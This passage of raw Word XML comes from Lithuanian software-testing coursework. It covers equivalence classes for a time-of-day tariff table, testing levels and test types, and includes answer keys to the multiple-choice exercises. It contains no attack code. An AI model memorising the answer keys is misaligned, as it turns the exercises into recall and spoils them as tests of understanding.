          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nustatykite ekvivalentumo klases kiekvienai klasei.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="221"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1501"/>
        <w:gridCol w:w="1501"/>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1502"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>00:01   08:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>08:01   13:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>13:01   16:59</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>17:00   23:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>23:01   00:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>nemokamai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1501" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>1,00 euro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>1,50 euro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>2,00 euro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>nemokamai</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prielaida: Tarifų pasikeitimai taikomi minučių tikslumu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0000320E" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>1.4.</w:t>
      </w:r>
      <w:r w:rsidR="003F4492">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E5160" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="009F25BE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>okymosi rezultatas. Kurti ir vykdyti skirtingų lygių ir tipų funkcinius testavimo atvejus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009F25BE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>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TESTAVIMO LYGIAI: INTEGRATION, SYSTEM, ACCEPTANCE</w:t>
      </w:r>
      <w:r w:rsidR="00EC64C4">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004E350E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:num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1701"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="222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Atsakinga grupė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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Komponentų testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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Integracijos testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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Sistemos testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="166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Priėmimo testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2223"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Programuotojai</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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c>
          <w:tcPr>
            <w:tcW w:w="18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c>
          <w:tcPr>
            <w:tcW w:w="1701"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jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666"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jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2223"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Testuotojai</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701"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jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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c>
          <w:tcPr>
            <w:tcW w:w="170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c>
          <w:tcPr>
            <w:tcW w:w="166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r>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="222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Verslo atstovai / galutiniai vartotojai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701"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jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701"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c>
          <w:tcPr>
            <w:tcW w:w="166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jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>d</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0F4F56" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00EC64C4">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TESTŲ TIPAI,</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMOKE, REGRESSION TESTAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00EC64C4">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:num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285"/>
        <w:gridCol w:w="3285"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3284"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Funkcinis testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Priėmimo testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Komponentų testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285"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Nefunkcinis testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Saugumo testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Našumo testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Apkrovos testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Prieinamumo testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Lokalizavimo testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285"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Palaikymo testaviams</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Palaikymo testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a,c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ėra teisingo atsakymo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>b,c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:num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9"/>
        <w:gridCol w:w="4582"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927"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Juodosios dėžės testavimo metodai:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Atsitiktinis testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Testavimas pagal reikalavimų specifikaciją</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Apkrovos testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Našumo testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Scenarijų testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Modifikuotas sprendimų testavimas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Panaudos atvejų testavimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
